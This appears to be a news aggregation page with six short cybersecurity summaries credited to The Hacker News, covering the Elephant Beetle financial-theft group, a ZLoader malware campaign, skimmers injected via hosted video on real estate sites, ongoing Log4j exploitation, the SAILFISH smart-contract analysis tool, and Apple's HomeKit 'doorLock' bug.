Select Page
Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation

Researchers Uncover Hacker Group Behind Organized Financial-Theft Operation

Cybersecurity researchers have taken the wraps of an organized financial-theft operation undertaken by a discreet actor to target transaction processing systems and siphon funds from entities primarily located in Latin America for at least four years.

The malicious hacking group has been codenamed Elephant Beetle by Israeli incident response firm Sygnia, with the intrusions aimed at banks and retail companies by injecting fraudulent transactions among benign activity to slip under the radar after an extensive study of the targets’ financial structures.

“The attack is relentless in its ingenious simplicity serving as an ideal tactic to hide in plain sight, without any need to develop exploits,” the researchers said in a report shared with The Hacker News, calling out the group’s overlaps with another tracked by Mandiant as FIN13, an “industrious” threat actor linked to data theft and ransomware attacks in Mexico stretching back as early as 2016.

Elephant Beetle is said to leverage an arsenal of no fewer than 80 unique tools and scripts to execute its attacks, while simultaneously taking steps to blend in with the victim’s environment over long periods to achieve its objectives.

“The unique modus operandi associated with the Elephant Beetle is their deep research and knowledge of victim’s financial systems and operations and their persistent search for vulnerable methods to technically inject financial transactions, ultimately leading to major financial theft,” Arie Zilberstein, vice president of incident response at Sygnia, told The Hacker News. “Given the long period of persistence this group has in victim’s networks, they often change and adapt their techniques and tooling to continue to be relevant.”

images from Hacker News

New Zloader Banking Malware Campaign Exploiting Microsoft Signature Verification

New Zloader Banking Malware Campaign Exploiting Microsoft Signature Verification

An ongoing ZLoader malware campaign has been uncovered exploiting remote monitoring tools and a nine-year-old flaw concerning Microsoft’s digital signature verification to siphon user credentials and sensitive information.

Israeli cybersecurity company Check Point Research, which has been tracking the sophisticated infection chain since November 2021, attributed it to a cybercriminal group dubbed MalSmoke, citing similarities with previous attacks.

“The techniques incorporated in the infection chain include the use of legitimate remote management software (RMM) to gain initial access to the target machine,” Check Point’s Golan Cohen said in a report shared with The Hacker News. “The malware then exploits Microsoft’s digital signature verification method to inject its payload into a signed system DLL to further evade the system’s defenses.”

A banking trojan at its core, ZLoader has been employed by many an attacker to steal cookies, passwords, and other private information from victims’ machines, not to mention gaining notoriety for acting as a distribution framework for Conti ransomware, according to an advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in September 2021.

The campaign is said to have claimed 2,170 victims across 111 countries as of January 2, 2022, with most of the affected parties located in the U.S., Canada, India, Indonesia, and Australia. It’s also notable for the fact that it wraps itself in layers of obfuscation and other detection-evasion methods to elude discovery and analysis.

The attack flow commences with tricking users into installing a legitimate enterprise remote monitoring software called Atera, using it to upload and download arbitrary files as well as execute malicious scripts. However, the exact mode of distributing the installer file remains unknown as yet.

images from Hacker News

Hackers Target Real Estate Websites with Skimmer in Latest Supply Chain Attack

Hackers Target Real Estate Websites with Skimmer in Latest Supply Chain Attack

Threat actors leveraged a cloud video hosting service to carry out a supply chain attack on more than 100 real estate websites operated by Sotheby’s Realty that involved injecting malicious skimmers to steal sensitive personal information.

“The attacker injected the skimmer JavaScript codes into video, so whenever others import the video, their websites get embedded with skimmer codes as well,” Palo Alto Networks’ Unit 42 researchers said in a report published this week.

The skimmer attacks, also called formjacking, relates to a type of cyber attack wherein bad actors insert malicious JavaScript code into the target website, most often to checkout or payment pages on shopping and e-commerce portals, to harvest valuable information such as credit card details entered by users.

images from Hacker News

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities

Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems.

“Exploitation attempts and testing have remained high during the last weeks of December,” Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. “We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks.”

Publicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka Log4Shell, has emerged as a new attack vector for widespread exploitation by a variety of threat actors.

In the subsequent weeks, four more weaknesses in the utility have come to light — CVE-2021-45046CVE-2021-45105CVE-2021-4104, and CVE-2021-44832 — providing opportunistic bad actors with persistent control over the compromised machines and mount an evolving array of attacks ranging from cryptocurrency miners to ransomware.

Even as the mass scanning attempts are showing no signs of letting up, efforts are underway to evade string-matching detections by obfuscating the malicious HTTP requests orchestrated to generate a web request log using Log4j that leverages JNDI to perform a request to the attacker-controlled site.

images from Hacker News

SAILFISH System to Find State-Inconsistency Bugs in Smart Contracts

SAILFISH System to Find State-Inconsistency Bugs in Smart Contracts

A group of academics from the University of California, Santa Barbara, has demonstrated what it calls a “scalable technique” to vet smart contracts and mitigate state-inconsistency bugs, discovering 47 zero-day vulnerabilities on the Ethereum blockchain in the process.

Smart contracts are programs stored on the blockchain that are automatically executed when predetermined conditions are met based on the encoded terms of the agreement. They allow trusted transactions and agreements to be carried out between anonymous parties without the need for a central authority.

In other words, the code itself is meant to be the final arbiter of “the deal” it represents, with the program controlling all aspects of the execution, and providing an immutable evidentiary audit trail of transactions that are both trackable and irreversible.

This also means that vulnerabilities in the code could result in hefty losses, as evidenced by hacks aimed at the DAO and more recently, MonoX, where adversaries exploited loopholes to illicitly siphon funds, a scenario that could have catastrophic consequences given the burgeoning adoption of smart contracts over the past few years.

“Since smart contracts are not easily upgradable, auditing the contract’s source pre-deployment, and deploying a bug-free contract is even more important than in the case of traditional software,” the researchers detailed in a paper.

images from Hacker News

Researchers Detail New HomeKit ‘doorLock’ Bug Affecting Apple iOS

Researchers Detail New HomeKit ‘doorLock’ Bug Affecting Apple iOS

A persistent denial-of-service (DoS) vulnerability has been discovered in Apple’s iOS mobile operating system that’s capable of sending affected devices into a crash or reboot loop upon connecting to an Apple Home-compatible appliance.

The behavior, dubbed “doorLock,” is trivial in that it can be triggered by simply changing the name of a HomeKit device to a string larger than 500,000 characters.

This causes an iPhone or iPad that attempts to connect to the device to become unresponsive and enter an indefinite cycle of system failure and restart that can only be mitigated by restoring the affected device from Recovery or DFU (Device Firmware Update) Mode.

HomeKit is Apple’s software framework that allows iOS and iPadOS users to configure, communicate with, and control connected accessories and smart-home appliances using Apple devices.

“Any device with an affected iOS version installed that loads the string will be disrupted, even after rebooting,” security researcher Trevor Spiniolas said. “Restoring a device and signing back into the iCloud account linked to the HomeKit device will again trigger the bug.”

images from Hacker News